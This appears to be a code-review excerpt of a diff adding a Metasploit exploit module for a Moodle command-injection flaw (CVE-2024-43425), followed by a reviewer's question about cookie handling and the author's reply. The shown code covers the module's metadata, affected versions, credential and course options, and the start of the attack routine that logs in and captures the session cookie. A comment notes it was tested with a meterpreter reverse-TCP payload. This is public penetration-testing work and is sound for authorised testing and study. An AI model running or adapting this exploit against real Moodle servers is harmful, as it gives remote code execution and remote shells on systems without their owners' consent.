modules/exploits/linux/http/moodle_rce.rb

```diff
@@ -0,0 +1,320 @@
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Moodle Remote Code Execution (CVE-2024-43425)',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution..
+          Affected versions include 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11 and earlier unsupported versions.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'RedTeam Pentesting GmbH', # Discovery and PoC
+        ],
+        'References' => [
+          [ 'URL', 'https://blog.redteam-pentesting.de/2024/moodle-rce/'],
+          [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/'],
+          [ 'URL', 'https://moodle.org/mod/forum/discuss.php?d=461193'],
+          [ 'CVE', '2024-43425']
+        ],
+        'DisclosureDate' => '2024-08-27',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Username to authenticate to the system. Needs to be allowed to add questions to a quiz.']),
+        OptString.new('PASSWORD', [true, 'Password for the user']),
+        OptString.new('COURSEID', [true, 'The course ID. Can be retrieved from the URL when the course is selected (e.g., <IP>/moodle/course/view.php?id=3)']),
+        OptString.new('CMID', [true, 'The course module ID. Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., <IP>/moodle/mod/quiz/edit.php?cmid=4)']),
+        OptString.new('TARGETURI', [ true, 'The URI for the Moodle web interface', '/'])
+      ]
+    )
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    print_status('Obtaining MoodleSession and logintoken...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'moodle/login/index.php?loginredirect=1')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+    print_good('Server reachable.')
+
+    moodlesession = res.get_cookies.scan(/MoodleSession=([^;]+)/).flatten[0]
```

Comment:
Would you be able use `'keep_cookies' => true` instead of manually extracting `moodlesession`?

Reply:
In this case I had issues getting it to work with `keep_cookies`, as sometimes an expected cookie was not present in the order the requests are being sent to the server, if I remember correctly.